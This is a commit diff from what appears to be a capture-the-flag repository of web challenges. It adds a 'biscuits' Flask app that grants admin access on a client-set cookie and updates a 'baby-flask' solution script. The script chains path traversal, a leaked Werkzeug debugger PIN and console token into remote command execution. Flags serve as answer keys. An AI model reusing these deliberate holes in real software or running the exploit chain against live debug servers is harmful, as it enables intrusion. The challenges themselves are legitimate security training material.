web(biscuits, looooong, nmapper, sql-sleuth, ssrfing) - added , web(b…

…aby-flask, flask-master) - minor fixes

.gitignore

@@ -1 +1 @@
-.ctf/
+.ctf/

web/baby-flask/.gitignore

@@ -0,0 +1,2 @@
+*.log
+*.pid

web/baby-flask/challenge.yml

@@ -15,15 +15,13 @@ extra:
   compose_stack: !filecontents docker-compose.yml
 
 flags:
-  - GTBQ{w3ll_d0ne_but_1_H0p3_Y0u_4rE_n0t_d0ne_y3t_g0_f0r_p4rt_2}
+  - GTBQ{w3ll_d0ne_0n_tr4v3rs1ng_y0ur_w4y_0ut_YoU_c4nt_be_c0nstr41n3d_1n_4_fl4sk!}
 
 tags:
   - web
-  - easy
+  - medium
 
 files:
-  - "public/public.zip"
 
 state: visible
 version: "0.1"
-

web/baby-flask/docker-compose.yml

@@ -10,3 +10,6 @@ services:
     environment:
       - FLASK_APP=/app/app.py
       - FLASK_ENV=development
+    volumes:
+      - /etc/machine-id:/etc/machine-id
+    #   - ./setup/app:/app

web/baby-flask/setup/app/templates/index.html

@@ -1,94 +1,26 @@
-<!DOCTYPE html>
-<html>
-
-<head>
-    <title>Flask File Manager</title>
-    <style>
-        body {
-            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
-            background-color: #4bd6e8;
-            margin: 0;
-            padding: 0;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-        }
-
-        .container {
-            background-color: #ffffff;
-            box-shadow: 0 0 20px rgba(0, 0, 0, 0.2);
-            border-radius: 12px;
-            padding: 20px;
-            width: 80%;
-            max-width: 600px;
-            text-align: center;
-        }
-
-        h1 {
-            color: #5900ff;
-            font-size: 2em;
-            margin-bottom: 10px;
-        }
-
-        h3, h4 {
-            color: rgb(3, 20, 109);
-        }
-
-        ul {
-            list-style-type: none;
-            padding: 0;
-        }
-
-        li {
-            margin: 10px 0;
-        }
-
-        form {
-            display: flex;
-            justify-content: center;
-            align-items: center;
-        }
-
-        button {
-            background-color: #2401bc;
-            color: white;
-            border: none;
-            border-radius: 25px;
-            padding: 10px 20px;
-            cursor: pointer;
-            font-size: 1em;
-            transition: background-color 0.3s ease;
-        }
-
-        button:hover {
-            background-color: #0412aa;
-        }
-
-        button:focus {
-            outline: none;
-            box-shadow: 0 0 10px #0051ff;
-        }
-    </style>
-</head>
-
-<body>
-    <div class="container">
-        <h1>Welcome to my Flask file manager</h1>
-
-        <h3>Have a look at my files</h3>
-        <h4>Click on a file to view it!</h4>
-        <ul>
-            {% for file in files %}
-            <li>
-                <form action="/get_file" method="post">
-                    <input type="hidden" name="filename" value="/app/files/{{ file }}">
-                    <button type="submit">{{ file }}</button>
-                </form>
-            </li>
-            {% endfor %}
-        </ul>
+{% extends "layout.html" %}
+
+{% block content %}
+<div class="container my-5">
+    <h1 class="text-center text-neon">Welcome to my Flask File Manager</h1>
+
+    <div class="card bg-dark mt-4">
+        <div class="card-header text-neon">
+            <h3>Have a look at my files</h3>
+        </div>
+        <div class="card-body">
+            <h4 class="text-neon">Click on a file to view it!</h4>
+            <ul class="list-group">
+                {% for file in files %}
+                <li class="list-group-item bg-dark border-light">
+                    <form action="/get_file" method="post" class="d-inline">
+                        <input type="hidden" name="filename" value="/app/files/{{ file }}">
+                        <button type="submit" class="btn btn-link text-neon">{{ file }}</button>
+                    </form>
+                </li>
+                {% endfor %}
+            </ul>
+        </div>
     </div>
-</body>
-
-</html>
+</div>
+{% endblock %}

web/baby-flask/setup/app/templates/layout.html

@@ -0,0 +1,16 @@
+<!DOCTYPE html>
+<html lang="en">
+	<head>
+		<meta charset="UTF-8" />
+		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
+		<link
+			href="https://hackerthemes.com/bootstrap-themes/demo/theme-machine/neon-glow/css/bootstrap4-neon-glow.css"
+			rel="stylesheet"
+		/>
+		{% block head %} {% endblock %}
+	</head>
+	<body>
+		{% block content %} {% endblock %} {% block after_content %} {%
+		endblock%}
+	</body>
+</html>

web/baby-flask/setup/flag.txt

@@ -1 +1 @@
-GTBQ{w3ll_d0ne_but_1_H0p3_Y0u_4rE_n0t_d0ne_y3t_g0_f0r_p4rt_2}
+GTBQ{w3ll_d0ne_0n_tr4v3rs1ng_y0ur_w4y_0ut_YoU_c4nt_be_c0nstr41n3d_1n_4_fl4sk!}

web/baby-flask/solution/advanced.py

@@ -1,8 +1,9 @@
 from wconsole_extractor import WConsoleExtractor
 import requests
 import re
+import sys
 
-url = 'http://localhost:1337'
+url = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:1337'
 
 def leak_function(filename) -> str:
     r = requests.post(f'{url}/get_file', data={'filename': filename})

web/baby-flask/solution/path_traversal.py

@@ -1,29 +1,30 @@
 import requests
 import re
+import sys
 
-url = 'http://localhost:1337'
+url = sys.argv[1] if len(sys.argv) > 1 else 'http://localhost:1337'
 
 s = requests.Session()
 
-r = s.post('http://localhost:1337/get_file', data={'filename': '/app/logs/flask-error.log'})
+r = s.post(f'{url}/get_file', data={'filename': '/app/logs/flask-error.log'})
 # print(r.text)
 # find the pin code
 pin_code = re.search(r'PIN: (\d+-\d+-\d+)', r.text).group(1)
 print(f'Pin code: {pin_code}')
 
 # fetch console token from html error messages (only needed if logging in headlessly)
-r = s.post('http://localhost:1337/get_file', data={'filename': '/file_that_does_not_exist'})
+r = s.post(f'{url}/get_file', data={'filename': '/file_that_does_not_exist'})
 # print(r.text)
 console_token = re.search(r'SECRET = "(.*)";', r.text).group(1)
 print(f'Console token : {console_token}')
 
 # get auth cookie from flask by performing pinauth
-r = s.get('http://localhost:1337/console', params={'__debugger__': 'yes', 'cmd': 'pinauth', 'pin': pin_code, 's': console_token})
+r = s.get(f'{url}/console', params={'__debugger__': 'yes', 'cmd': 'pinauth', 'pin': pin_code, 's': console_token})
 
 # execute ls in the console
-r = s.get('http://localhost:1337/console', params={'__debugger__': 'yes', 'cmd': 'import subprocess; print(subprocess.check_output(["ls", "/"]).decode())', 'frm': 0, 's': console_token})
+r = s.get(f'{url}/console', params={'__debugger__': 'yes', 'cmd': 'import subprocess; print(subprocess.check_output(["ls", "/"]).decode())', 'frm': 0, 's': console_token})
 
 flag_file = re.search(r'flag-\w+.txt', r.text).group(0)
 # read the flag file
-r = s.get('http://localhost:1337/console', params={'__debugger__': 'yes', 'cmd': f'import subprocess; print(subprocess.check_output(["cat", "/{flag_file}"]).decode())', 'frm': 0, 's': console_token})
+r = s.get(f'{url}/console', params={'__debugger__': 'yes', 'cmd': f'import subprocess; print(subprocess.check_output(["cat", "/{flag_file}"]).decode())', 'frm': 0, 's': console_token})
 print(r.text)

web/biscuits/challenge.yml

@@ -0,0 +1,27 @@
+name: "Biscuits"
+author: "Evangelospro"
+category: web
+
+description: |
+  In England, they're called biscuits, but I prefer to call them cookies. I've curated a page to celebrate these delightful treats from around the world. Explore and discover the hidden delights within—I hear there's something special waiting for those who navigate to /admin.
+
+value: 500
+type: dynamic_docker
+extra:
+  initial: 500
+  minimum: 100
+  decay: 25
+  redirect_type: http
+  compose_stack: !filecontents docker-compose.yml
+
+flags:
+  - GTBQ{c00ki3s_ar3_d3lici0us}
+
+tags:
+  - web
+  - beginner
+
+files:
+
+state: visible
+version: "0.1"

web/biscuits/docker-compose.yml

@@ -0,0 +1,15 @@
+version: '3'
+services:
+  web:
+    build:
+      context: ./setup
+      dockerfile: Dockerfile
+    image: ghcr.io/cybermouflons/gtbq-2024/biscuits:latest
+    ports:
+      - 1337:80
+    environment:
+      - FLAG=GTBQ{c00ki3s_ar3_d3lici0us}
+      - FLASK_APP=/app/app.py
+      - FLASK_ENV=development
+    # volumes:
+    #   - ./setup/app:/app

web/biscuits/setup/Dockerfile

@@ -0,0 +1,14 @@
+# Use the official Python base image
+FROM python:3.9-slim
+
+WORKDIR /app
+
+COPY ./app/requirements.txt /app/requirements.txt
+
+RUN pip install --no-cache-dir -r requirements.txt
+
+COPY ./app /app/
+
+EXPOSE 80
+
+ENTRYPOINT ["python3", "/app/app.py"]

web/biscuits/setup/app/app.py

@@ -0,0 +1,21 @@
+import os
+from flask import Flask, render_template, request, redirect, g, url_for, make_response
+
+app = Flask(__name__)
+
+FLAG = os.getenv('FLAG', 'GTBQ{Contact_Admin_If_You_See_This}')
+
+@app.route('/')
+def index():
+    resp = make_response(render_template('index.html'))
+    resp.set_cookie('is_admin', 'false')
+    return resp
+
+@app.route('/admin')
+def admin():
+    if request.cookies.get('is_admin') == 'true':
+        return render_template('admin.html', flag=FLAG)
+    else:
+        return redirect(url_for('index'))
+
+app.run(host='0.0.0.0', port=80, debug=True)

web/biscuits/setup/app/flag.txt

@@ -0,0 +1 @@
+GTBQ{C0mm4nd_Inj3cti0n_1s_4_G4m3_0v3r!!!}

web/biscuits/setup/app/requirements.txt

@@ -0,0 +1 @@
+flask

web/biscuits/setup/app/templates/admin.html

@@ -0,0 +1,14 @@
+{% extends "layout.html" %}
+
+{% block content %}
+<div class="container mt-5">
+    <h2>Congratulations!</h2>
+    <div class="alert alert-success" role="alert">
+        <h4 class="alert-heading">Welcom back admin!</h4>
+        <p>Here is your flag:</p>
+        <hr>
+        <p class="mb-0"><strong>{{flag}}</strong></p>
+    </div>
+    <img src="{{ url_for('static', filename='images/code.png') }}" class="img-fluid" alt="code">
+</div>
+{% endblock %}

web/biscuits/setup/app/templates/header.html

@@ -0,0 +1,24 @@
+<nav class="navbar navbar-expand-lg navbar-light bg-dark">
+	<a class="navbar-brand" href="#">COOKIES</a>
+	<button
+		class="navbar-toggler"
+		type="button"
+		data-toggle="collapse"
+		data-target="#navbarNav"
+		aria-controls="navbarNav"
+		aria-expanded="false"
+		aria-label="Toggle navigation"
+	>
+		<span class="navbar-toggler-icon"></span>
+	</button>
+	<div class="collapse navbar-collapse" id="navbarNav">
+		<ul class="navbar-nav">
+			<li class="nav-item">
+				<a class="nav-link" href="/">Home</a>
+			</li>
+			<li class="nav-item">
+				<a class="nav-link" href="/admin">Admin</a>
+			</li>
+		</ul>
+	</div>
+</nav>